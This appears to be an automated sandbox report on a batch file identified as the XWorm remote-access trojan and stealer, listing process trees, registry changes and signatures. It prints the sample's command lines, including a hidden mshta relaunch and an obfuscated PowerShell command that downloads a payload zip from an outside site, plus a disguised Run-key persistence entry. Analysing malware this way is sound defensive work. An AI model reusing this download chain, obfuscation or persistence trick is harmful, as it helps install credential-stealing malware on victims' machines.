Malware Analysis Report

2025-08-05 11:54

Sample ID 241015-3n412ashja
Target 11.bat
SHA256 2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc
Tags
xworm credential_access discovery persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc

Threat Level: Known bad

The file 11.bat was found to be: Known bad.

Malicious Activity Summary

xworm credential_access discovery persistence rat spyware stealer trojan

Detect Xworm Payload

Xworm

Uses browser remote debugging

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Unsecured Credentials: Credentials In Files

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Enumerates system info in registry

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-15 23:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-15 23:40

Reported

2024-10-15 23:43

Platform

win7-20241010-en

Max time kernel

122s

Max time network

129s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 524 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 524 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 524 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 524 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 524 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 524 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2556 wrote to memory of 2016 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2016 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2016 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe
PID 2016 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2016 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2016 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2016 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2016 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2016 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2016 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2016 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2016 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\11.bat"" ::",0)(window.close)

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" ::"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.P~37, 1%w%jF,fXtX%k%Qi[NN,$AICSALx_$$%coMMONPRogRAmw6432:~1, 1%J1%dGtLVU%h%jQqkBx%w%ohVlWGB%W1%WWLhu%h%pRJZg%p%tRQR,Bj%s%dLQP?g%S1%XVlPzC%d%])b#j?%w%ipATPi_%k%GoA$sjtXRUWldbsveEsiUdSjdtF])g$%a%zN[h$P::FWfQj3f9.zip') "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2872-5-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2872-6-0x0000000002320000-0x0000000002328000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-15 23:40

Reported

2024-10-15 23:43

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Admin\\AppData\\Local\\WindowsSecurity.lnk" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 384 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 384 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 384 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 384 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1176 wrote to memory of 2340 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 2340 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2340 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2340 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 3852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 3852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 3820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 3820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2340 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2340 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe
PID 5028 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe
PID 5028 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe
PID 3408 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
PID 3408 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe
